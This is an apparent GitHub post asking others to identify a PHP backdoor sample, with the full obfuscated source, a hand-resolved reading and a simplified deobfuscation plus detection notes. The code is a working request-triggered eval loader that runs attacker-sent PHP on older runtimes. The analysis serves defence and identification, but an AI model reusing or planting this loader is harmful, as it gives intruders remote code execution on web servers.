PHP RCE (anyone recognize it?)
<?php
/**
* Hand-resolved view of the obfuscated sample: what its character-by-character string
* concatenation evaluates to. The code is a PHP backdoor (a request-triggered eval loader).
*
* Arguments whose values are missing (and unused) are shown as bare `?` placeholders
* (the original note called them "exclamation marks"), so this listing is a reading aid
* and not valid PHP.
*
* Defender notes:
* - create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so the sample can
*   only execute on older runtimes.
* - The trigger is a request parameter or cookie named "vlqokbmd", or an HTTP_VLQOKBMD entry
*   in $_SERVER (PHP exposes request headers under HTTP_* keys). Both names are useful search
*   terms for access logs and WAF/proxy logs.
* - The trigger value is Base64 text stored reversed, so any "=" padding sits at the front of
*   the value rather than at the end.
* - Whatever arrives in that value is passed to eval with no authentication check in the
*   visible code; a host carrying this file should be handled as compromised.
*/
// Build an anonymous function whose parameter list is blank (' ') and whose body evals the
// LAST argument it receives, fetched through func_get_args().
$job = create_function(' ', 'eval(array_pop(func_get_args()));');
// Call it: every argument except the final string is ignored filler (its purpose is unclear).
// The final string is the loader: merge $_REQUEST, $_COOKIE and $_SERVER, look up the trigger
// key, die if it is absent, otherwise eval strrev(base64_decode(strrev(value))).
$job(?, ?, ?, ?, ?, 'u', '?', 'c', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["vlqokbmd"])?$i["vlqokbmd"]:(isset($i["HTTP_VLQOKBMD"])?$i["HTTP_VLQOKBMD"]:die);eval(strrev(base64_decode(strrev($a))));');
<?php
/*
* Obfuscated form of the sample. The listing has three parts:
*   1. Short string variables with dictionary-word names that serve as character lookup
*      tables. Many of them are never read afterwards and only add noise.
*   2. $graciously, concatenated one character at a time into the string "create_function",
*      then called as a variable function to build $job (a function that evals its last
*      argument).
*   3. The call to $job(...). Its last argument, also concatenated one character at a time,
*      is the request-triggered loader. Several of the leading arguments index variables
*      that are never assigned in this listing.
*
* Detection notes: the strings "eval", "create_function", "base64_decode" and the trigger name
* do not occur literally anywhere below, so keyword signatures miss this form. What does stand
* out is structural: long runs of `$name['n']` single-character indexing joined with `.`, and
* a call through a variable holding a function name.
*/
$graywacke = 'j(Ob';$authentic = 'h';$godfather = 'r'; $astronaut='as';$bearably ='_trR(Q=g';$kristel= '"';$carbonaceous= 'e'; $ileum =')';$downside='e'; $bustard =';'; $dabbler ='u"$]';$bitterer = 'mH6iisc)';
$genius = ':eq_';$archers =']s';$ezechiel= 't';$backdoor= ':';$fondness= 'mL'; $briefcase = 'Ta_'; $baths= '(Kb;T'; $inviable ='V';$hasher=','; $choker ='Ki'; $bibbing= 'sa'; $belgians='[';$chatters ='$';$diffeomorphism ='_Pd';
$cannot= 'D'; $learning= 'e")QK'; $grail = ',b$_oOSBl';
$censors= 'a'; $devolve='RZ_'; $inducible = 'a';
$horton='pE)';$confession ='`'; $gated = 'aar$;yT';$channellers= ')'; $descry= 'o_=';
$diatribes = 'yU';$interstate ='(';$guilbert='r';
$longish='m';$demonstrate='fa['; $ameliorating = 'PiOk)ev'; $lora='o';$augustus= 'rbe';
$dissolved='"';$curtail ='TRE'; $kimbell = '^Ocwkrq'; $frontier='T'; $decant = 'a'; $flavor= 'C';
$ingenuity='d';$concentration='(B';$gradate = 'e[$"_e';
$drugstore ='ri)ltvnts'; $burns ='u$sld';$installed = 'p'; $ingemar= '_u;_dI]t$';$enchantment=' itr'; $cannot='U]';
$blandish = 'En)(rX_V'; $campaigning= 't';$colonels='"$gvlEL'; $handspike= 'vd[Mle4i)'; $cremations ='"';$disjunct = 'q'; $detergent='m';$leola='e';
$disagreements = 'e';$lackey='a';$juliette='iv';
$esteemed='ncSP[es';$caskets =')'; $correction= 'V';$crazy='('; $complicate ='f';$jest= 'S';
$brochures = 'Ntre';
$desolation = 'T';$carolann= '(';$cummer = ')csepV?';$cheston ='f';$dexterity ='v';$lax= 'Q?]K';
$intradepartment ='o(d'; $bombed ='va(DnQiaM';
$dull= '_sOYHeo';$healthily='rW$J(g$"L';$incarcerate= 'g';
// The last tables are defined on the next line, after which $graciously is assembled from
// single characters; it resolves to the string "create_function".
$austria ='k';$itself='eEiMor'; $bugles = 'c'; $amative ='R'; $graciously =$bugles. $itself['5'] .
$itself['0']. $bombed['7'] . $brochures[1] . $itself['0'].
$dull['0'] .$cheston .$ingemar['1'].
$bombed['4']. $bugles . $brochures[1]. $itself['2'] .$itself['4'].$bombed['4'] ;
// $ironstone is the first character of $enchantment, a single space: the blank parameter list.
$ironstone=$enchantment[0] ;
// Variable-function call through $graciously. The second argument resolves to
// 'eval(array_pop(func_get_args()));'. The line that closes this call also starts the $job(...)
// invocation, whose final argument is the loader string.
$job=$graciously ($ironstone,$itself['0']. $bombed['0'] . $bombed['7'] .$handspike[4]. $healthily[4]. $bombed['7'] .$itself['5'] .$itself['5'].$bombed['7']. $diatribes['0']. $dull['0'].$cummer['4'] .$itself['4']. $cummer['4'] . $healthily[4].$cheston.$ingemar['1'] . $bombed['4'] . $bugles.$dull['0'] .$incarcerate.
$itself['0'].$brochures[1]. $dull['0'] .$bombed['7']. $itself['5']. $incarcerate .
$dull['1']. $healthily[4]. $cummer['0'] . $cummer['0'] .
$cummer['0'].$ingemar['2']);$job($dorelle['6'] , $invulnerable,$boxcars['2'] ,$felizio['4'] ,
$lobo['4'], $ingemar['1'] ,$hayley['1'] , $lax['1'], $bugles,$healthily['6'] .$itself['2']. $descry['2'] . $bombed['7']. $itself['5'].
$itself['5'] .$bombed['7'] .$diatribes['0'].
$dull['0'].$detergent .
$itself['0']. $itself['5']. $incarcerate.$itself['0'] . $healthily[4] .
$healthily['6'].$dull['0'] .
$amative.$itself['1'].
$bombed['5'] . $cannot['0'] .$itself['1'] . $jest . $desolation .$grail[0] . $healthily['6'] . $dull['0'] . $flavor . $dull['2'].$dull['2'] . $lax['3'] .$ingemar['5'].
$itself['1']. $grail[0] .$healthily['6'] . $dull['0'] . $jest . $itself['1'] . $amative. $cummer['5'].$itself['1'].
$amative . $cummer['0']. $ingemar['2'] . $healthily['6']. $bombed['7'].
$descry['2']. $itself['2'] .$dull['1']. $dull['1'] . $itself['0'] . $brochures[1] . $healthily[4].$healthily['6']. $itself['2'].
$esteemed['4'].$healthily['7'] .
$bombed['0'] . $handspike[4] .$disjunct .
$itself['4'].$austria. $augustus['1'].
$detergent . $intradepartment['2']. $healthily['7'] .$lax['2'] .
$cummer['0']. $lax['1'] .
$healthily['6'] .
$itself['2'] . $esteemed['4'] .$healthily['7'].$bombed['0'].$handspike[4]. $disjunct .$itself['4']. $austria.$augustus['1'].$detergent . $intradepartment['2']. $healthily['7'] . $lax['2'] .$backdoor .$healthily[4].
$itself['2'].$dull['1'] .$dull['1'].$itself['0'].
$brochures[1] . $healthily[4] .$healthily['6'].$itself['2']. $esteemed['4'] . $healthily['7'] . $dull['4'] .$desolation. $desolation.$esteemed[3]. $dull['0'] .$cummer['5'].$healthily['8'] .$bombed['5'].
$dull['2'].$lax['3'] . $concentration['1'].$itself['3'] . $bombed[3]. $healthily['7'] .
$lax['2'].
$cummer['0'] .$lax['1'] . $healthily['6']. $itself['2']. $esteemed['4'].$healthily['7']. $dull['4'] . $desolation .$desolation.$esteemed[3] . $dull['0']. $cummer['5'] .$healthily['8'].$bombed['5'] .$dull['2'].$lax['3'] .
$concentration['1'].$itself['3'] . $bombed[3].$healthily['7'].$lax['2']. $backdoor .
$intradepartment['2'].
$itself['2'] . $itself['0'] .$cummer['0'] .$ingemar['2'].$itself['0'].$bombed['0'].
$bombed['7'].$handspike[4] . $healthily[4] . $dull['1'] .
$brochures[1].
$itself['5'].$itself['5'] .$itself['0'].$bombed['0'].
$healthily[4] . $augustus['1'] .$bombed['7'] . $dull['1']. $itself['0']. $bitterer['2'].
$handspike['6']. $dull['0'] .$intradepartment['2'].
$itself['0'] . $bugles. $itself['4']. $intradepartment['2'].
$itself['0']. $healthily[4] . $dull['1'].$brochures[1] .$itself['5']. $itself['5']. $itself['0'] .$bombed['0']. $healthily[4] .$healthily['6'].$bombed['7'] . $cummer['0'] .$cummer['0'] . $cummer['0'].
$cummer['0']. $ingemar['2'] );
<?php
/**
* Simplified (full deobf): the loader string passed as the last argument of the sample,
* written out as ordinary statements for reading.
*
* NOTE(review): this is not an exact transcription of the payload string. A `$` sigil is
* dropped in the first ternary branch, and the payload's parentheses around the inner ternary
* are omitted. Use it to understand the logic; use the payload string itself for signatures.
*
* eval is a language construct, so a disable_functions entry cannot block it. Containment
* relies on removing the file and on finding how it was written to the host.
*/
$name = "vlqokbmd";
$name_variant = "HTTP_VLQOKBMD";
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER); // one lookup table built from request parameters, cookies and $_SERVER (request headers appear there as HTTP_* keys)
$enc_code = isset($i[$name]) // take the value under either trigger key; with neither present the script ends via die
? i[$name]
: isset($i[$name_variant])
? $i[$name_variant]
: die;
// Reverse the value, Base64-decode it, reverse the result and eval it: the sender's input runs
// as PHP code. The only gate visible here is the presence of the trigger key.
eval(strrev(base64_decode(strrev($enc_code))));
Owner

vikrrrr commented Jan 13, 2018

Does anyone know what this might be from? I unfortunately don't have any other samples.
